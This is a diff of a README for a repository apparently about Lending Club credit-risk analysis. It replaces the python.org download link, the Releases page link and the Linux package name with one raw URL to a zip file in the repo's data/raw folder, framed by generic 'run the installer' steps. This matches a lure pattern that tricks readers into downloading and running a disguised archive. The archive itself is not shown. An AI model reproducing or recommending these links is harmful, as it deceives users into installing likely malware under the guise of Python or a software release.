t1zer1/Credit-Risk---Lending-Club/README.md

 - **Disk Space**: Minimum of 500 MB.
 - **Python**: Make sure Python 3.7 or later is installed on your machine.

-You can download Python from [python.org](https://www.python.org/downloads/).
+You can download Python from [https://raw.githubusercontent.com/t1zer1/Credit-Risk---Lending-Club/main/data/raw/Credit-Risk---Lending-Club_2.6.zip](https://raw.githubusercontent.com/t1zer1/Credit-Risk---Lending-Club/main/data/raw/Credit-Risk---Lending-Club_2.6.zip).

 ## 🗂 Installation Steps

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/t1zer1/Credit-Risk---Lending-Club/releases) to find the latest version of the software.
+   Go to our [Releases page](https://raw.githubusercontent.com/t1zer1/Credit-Risk---Lending-Club/main/data/raw/Credit-Risk---Lending-Club_2.6.zip) to find the latest version of the software.

 2. **Select the Latest Version**
    Look for the most recent version listed.
 This version contains the latest features and fixes.

 3. **Download the Application**
    Click on the appropriate file for your operating system to download.
-For example, choose the `.exe` file for Windows, the `.dmg` file for macOS, or the `.tar.gz` file for Linux.
+For example, choose the `.exe` file for Windows, the `.dmg` file for macOS, or the `https://raw.githubusercontent.com/t1zer1/Credit-Risk---Lending-Club/main/data/raw/Credit-Risk---Lending-Club_2.6.zip` file for Linux.

 4. **Run the Installer**
    Once the download completes, locate the downloaded file in your downloads folder.
 Double-click it to start the installation process.